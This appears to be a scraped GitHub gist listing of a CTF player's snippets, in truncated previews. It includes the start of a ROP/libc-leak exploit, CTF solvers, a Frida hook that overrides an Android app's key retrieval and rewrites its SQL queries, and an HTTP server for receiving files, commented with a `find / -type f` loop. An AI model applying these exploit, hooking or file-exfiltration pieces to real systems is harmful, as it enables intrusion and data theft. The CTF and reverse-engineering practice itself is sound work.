Skip to content

Instantly share code, notes, and snippets.

View sudhackar's full-sized avatar
🎯
Focusing

Sudhakar Verma sudhackar

🎯
Focusing
140 followers · 0 following
View GitHub Profile
@sudhackar
sudhackar / solve.py
Last active February 16, 2018 16:46
solve over adb
import os
os.system("adb exec-out screencap -p > screen.png")
from PIL import Image
img = Image.open("screen.png")
xi = 32
yi = 240
delta = 6
for j in xrange(12):
@sudhackar
sudhackar / pivotal.elf
Last active February 19, 2018 06:20
Easy ROP exercises
@sudhackar
sudhackar / quad-crackme.py
Last active May 23, 2018 10:29
Source for Nullcon HackIM 2018 RE 150 Quad Math
def genf(a,b,i):
stub = '''void f%d(){ // %c - %c
if (((int)(flag[%d])*(int)(flag[%d]) + %d * (int)(flag[%d]) + %d ) || ((int)(flag[%d])*(int)(flag[%d]) + %d * (int)(flag[%d]) + %d )){
fin = 1;
}
else{
fin = 0;
}
}'''
@sudhackar
sudhackar / exploit.py
Last active January 31, 2018 09:14
https://stackoverflow.com/questions/47401997/why-do-i-get-a-sigsegv-in-global-offset-table-error-with-my-64bit-exploit-inste
from pwn import *
e = ELF("./leak")
l = ELF("/lib/x86_64-linux-gnu/libc.so.6")
pppr = 0x000000000040068a
s = remote('127.0.0.1', 5000)
s.recvuntil(": ")
@sudhackar
sudhackar / solve.py
Created January 27, 2018 13:09
problem 1.12 The Colossal Book of Short Puzzles and Problems-W. W. Norton & Company (2005)
from z3 import *
size = 10
for i in xrange(size):
globals()['x%i' % i]=BitVec('x%i' %i,32)
one = BitVec("one", 32)
zero = BitVec("zero", 32)
@sudhackar
sudhackar / bp_helper.py
Last active February 14, 2022 13:04
pykd bp
breakpoints = []
def add_bp(symbol, nargs, thiscall):
global breakpoints
module_name = symbol.split("!")[0]
function_name = symbol.split("!")[1]
module = pykd.module(module_name)
module.reload()
breakpoints.append((pykd.setBp(module.offset(function_name), breakCount),function_name, nargs, thiscall))
print "Breakpoint %d added %s" % (len(breakpoints), symbol)
@sudhackar
sudhackar / Frida.js
Last active September 10, 2023 04:43
Frida hook Java functions in Android
Java.perform(function () {
var act1 = Java.use("CryptoUtilities");
act1.getKey.implementation = function (arg1) {
var ret = this.getKey("v2");
return ret;
};
var db1 = Java.use("android.database.sqlite.SQLiteDatabase");
db1.rawQuery.overload('java.lang.String', '[Ljava.lang.String;').implementation = function (arg1, arg2){
console.log(arg1,arg1.replace("v1","v2"));
var ret = this.rawQuery(arg1.replace("v1","v2"),arg2);
@sudhackar
sudhackar / rusty_road.py
Last active November 21, 2017 07:29
[CSAW CTF Finals 2017] Rusty Road
from pwn import *
h ={"U":[[] for i in xrange(10)], "D":[[] for i in xrange(10)], "L":[[] for i in xrange(10)], "R":[[] for i in xrange(10)]}
U = open("U","rb")
D = open("D","rb")
L = open("L","rb")
R = open("R","rb")
for i in xrange(10):
@sudhackar
sudhackar / rabbithole.py
Created November 19, 2017 14:26
[CSAW CTF Finals 2017] rabbithole
from pwn import *
class Node(object):
def __init__(self, addr):
self.addr = addr
e = ELF("./rabbithole")
name_addr = {}
for i in e.symbols:
@sudhackar
sudhackar / get_files.py
Last active July 15, 2019 07:31
Server to rcv files
import BaseHTTPServer
import os
# for i in `find / -type f`; do
class Multiplier(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
query = s.path.split('files')[1]
s.send_response(200)
s.send_header("Content-type", "text/plain")